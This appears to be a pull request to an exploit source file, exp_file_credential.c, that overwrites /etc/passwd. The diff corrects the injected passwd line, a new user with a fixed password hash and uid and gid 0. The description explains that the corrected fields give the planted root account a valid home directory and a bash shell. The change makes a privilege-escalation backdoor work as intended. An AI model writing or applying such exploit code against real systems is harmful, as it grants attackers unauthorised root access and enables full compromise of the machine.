### PR TITLE
Update exp_file_credential.c

### DIFF
--- a/exp_file_credential.c
+++ b/exp_file_credential.c
@@ -72,7 +72,7 @@
 
 char *target = "/etc/passwd";
 char *overwrite =
-    "user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash\n";
+    "user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:root:/root:/bin/bash\n";
 char *global;
 char *self_path;
 char *content;


### PR DESCRIPTION
When you add a new line to /etc/passwd, change "/root/root" to "root:/root" (i.e. remove a slash and add a colon).
a) Adding the extra colon will treat "/root" as the home directory and "/bin/bash" as the shell, rather than treating "/bin/bash" as the home directory (which doesn't exist).
b) Removing the leading slash will made the comment "root" rather than "/root" (or "/root/root"). This isn't essential, but it's unusual for a comment to start with a slash.